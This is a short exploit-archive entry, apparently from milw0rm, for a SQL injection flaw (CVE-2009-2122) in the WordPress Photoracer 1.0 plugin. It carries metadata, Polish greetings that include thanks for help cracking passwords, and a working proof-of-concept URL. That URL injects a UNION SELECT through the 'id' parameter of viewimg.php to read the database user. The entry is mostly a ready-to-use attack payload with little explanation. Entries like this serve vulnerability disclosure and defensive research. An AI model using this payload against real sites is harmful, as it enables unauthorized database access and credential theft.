WordPress Plugin Photoracer 1.0 - 'id' SQL Injection

Author: Kacper
type: webapps
platform: php
port: 
date_added: 2009-06-14 
date_updated:  
verified: 1 
codes: OSVDB-55125;CVE-2009-2122 
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: 

Wordpress Photoracer Plugin => SQL injection
http://wordpress.org/extend/plugins/photoracer/

Author: Kacper
Website: http://devilteam.pl/

Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum,

Pozdro: Ratman, Kopaczka, FDJ

Elo: dla GLOBUSa za pomoc w crackowaniu hasel.

Vuln:

http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--

big thanks str0ke for you!

be safe all :)

# milw0rm.com [2009-06-15]